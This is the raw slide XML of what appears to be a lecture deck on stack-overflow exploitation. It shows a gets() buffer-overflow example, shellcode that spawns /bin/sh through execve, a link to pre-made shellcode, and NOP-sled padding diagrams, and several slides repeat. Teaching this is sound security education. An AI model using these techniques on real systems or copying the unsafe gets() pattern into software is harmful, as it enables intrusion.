                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2235"/>
              </a:lnSpc>
            </a:pP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900" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="542925" marR="4229100" indent="-1270">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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900" spc="-5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1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>];  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>puts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"where we're</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-8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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>going"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sz="1900" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="542925" marR="3300729" indent="-635">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>puts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"we don't need ... </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>roads."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);  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5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sz="19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542290">
              <a:lnSpc>
                <a:spcPts val="2265"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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sz="1900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900" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2265"/>
              </a:lnSpc>
            </a:pP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900" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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2342DA2-F937-4EE0-ADCB-B3D654BD8C29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827452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5683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More Relevant</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode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0223" y="2119628"/>
            <a:ext cx="5788025" cy="264541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Instead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of lame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shellcode:</a:t>
            </a:r>
            <a:endParaRPr sz="3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40"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="30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3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>“Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-2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World”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000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why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not do something more</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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exciting:</a:t>
            </a:r>
            <a:endParaRPr sz="3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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="30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3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>“/bin/sh”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5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C211BB7F-4DBA-4F0E-9CB6-30DBA60FEDFE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63431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4549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Pre-made</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode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9068" y="1739261"/>
            <a:ext cx="7981315" cy="34430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indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="430530" algn="l"/>
                <a:tab pos="431165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Some pre-made </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>exec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“/bin/sh”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3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shellcode:</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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http://shell-storm.org/shellcode/files/shellcode-811.php</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill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•"/>
            </a:pPr>
            <a:endParaRPr sz="2550" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="430530" marR="5080" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="430530" algn="l"/>
                <a:tab pos="431165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Sometimes you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reuse pre-made </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shellcode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,  but other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times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you need to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craft </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shellcode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to fit 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needs of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given scenario or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>binary</a:t>
            </a:r>
            <a:endParaRPr sz="3000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887730" marR="523875" lvl="1" indent="-381000">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365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hint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: you probably won’t be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able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to rely on pre-made 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 shellcode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for the upcoming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lab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CEE94A3-C89C-4E5F-A9C6-A243A907D504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276041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5532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23437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NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Sleds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019" y="1764259"/>
            <a:ext cx="4107179" cy="292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108585" indent="-381000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="392430" algn="l"/>
                <a:tab pos="3937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Remember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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nop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’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400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>\x90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) is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instruction that does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nothing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Calibri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marL="393065" marR="5080" indent="-381000">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="392430" algn="l"/>
                <a:tab pos="3937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If you don’t know the exact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address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your shellcode in  memory, pad your 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exploit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with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nop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instructions to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make  it more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reliable!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2923" y="4957908"/>
            <a:ext cx="4022090" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4022090" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4021923" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4021923" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2923" y="5272232"/>
            <a:ext cx="4022090" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4022090" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4021923" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4021923" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2923" y="5586557"/>
            <a:ext cx="754380" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="754380" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="754111" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754111" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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7034" y="5586557"/>
            <a:ext cx="1257300" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1257300" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1256849" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256849" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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53885" y="5586557"/>
            <a:ext cx="1508760" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1508760" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1508223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1508223" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2106" y="5586557"/>
            <a:ext cx="502920" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="502920" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="502737" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502737" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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11173" y="4957944"/>
          <a:ext cx="4086223" cy="857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4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461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90 90 90 90 90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-6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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="22860" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="203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203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90 90 90 90 90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-6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1">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="22860" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="203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35"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="18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shellcode </a:t>
                      </a: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90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-30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addr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070758" y="842571"/>
            <a:ext cx="5073203" cy="5726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6767BB67-2DAF-4DF6-957E-3F7DF6C9B5CE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629400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96841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23437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NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Sleds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019" y="1764259"/>
            <a:ext cx="4107179" cy="292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108585" indent="-381000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="392430" algn="l"/>
                <a:tab pos="3937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Remember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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nop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’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400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>\x90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) is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instruction that does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nothing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Calibri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marL="393065" marR="5080" indent="-381000">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="392430" algn="l"/>
                <a:tab pos="3937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If you don’t know the exact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address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your shellcode in  memory, pad your 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exploit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with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nop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instructions to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make  it more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reliable!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2923" y="4957908"/>
            <a:ext cx="4022090" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4022090" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4021923" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4021923" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2923" y="5272232"/>
            <a:ext cx="4022090" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4022090" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4021923" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4021923" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2923" y="5586557"/>
            <a:ext cx="754380" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="754380" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="754111" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754111" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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7034" y="5586557"/>
            <a:ext cx="1257300" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1257300" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1256849" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256849" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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53885" y="5586557"/>
            <a:ext cx="1508760" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1508760" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1508223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1508223" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2106" y="5586557"/>
            <a:ext cx="502920" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="502920" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="502737" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502737" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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11173" y="4957944"/>
          <a:ext cx="4086223" cy="857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4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461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90 90 90 90 90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-6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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="22860" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="203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203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90 90 90 90 90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-6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1">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="22860" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="203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35"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="18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shellcode </a:t>
                      </a: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90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-30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addr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070756" y="842577"/>
            <a:ext cx="5073203" cy="5726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60FE0C76-A689-4849-B22E-2DB240AF8DFA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9877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3244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Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-95" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>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90660" y="1995416"/>
            <a:ext cx="5265420" cy="3751579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="19049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snippet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char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*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shell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];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85725" marR="983615" indent="-635">
              <a:lnSpc>
                <a:spcPct val="115599"/>
              </a:lnSpc>
            </a:pP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shell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]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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"/bin/sh"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;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 shell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]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00AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>NULL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;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>execve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shell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], </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shell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AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>NULL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);  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exit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2499" y="3083451"/>
            <a:ext cx="3070225" cy="14770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Shellcode is generally  hand coded in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assembly,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but its functionality can  be represented in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E074BD24-5476-41C4-AAED-E5BE9F5AC0FD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168857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23437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NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Sleds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019" y="1764259"/>
            <a:ext cx="4107179" cy="292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108585" indent="-381000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="392430" algn="l"/>
                <a:tab pos="3937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Remember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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nop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’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400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>\x90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) is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instruction that does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nothing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Calibri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marL="393065" marR="5080" indent="-381000">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="392430" algn="l"/>
                <a:tab pos="3937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If you don’t know the exact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address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your shellcode in  memory, pad your </a:t>
            </a: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exploit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with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nop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instructions to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make  it more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reliable!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2923" y="4957908"/>
            <a:ext cx="4022090" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4022090" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4021923" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4021923" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2923" y="5272232"/>
            <a:ext cx="4022090" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4022090" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4021923" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4021923" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2923" y="5586557"/>
            <a:ext cx="754380" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="754380" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="754111" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754111" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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7034" y="5586557"/>
            <a:ext cx="1257300" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1257300" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1256849" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256849" y="267737"/>
                </a:lnTo>
                <a:lnTo>
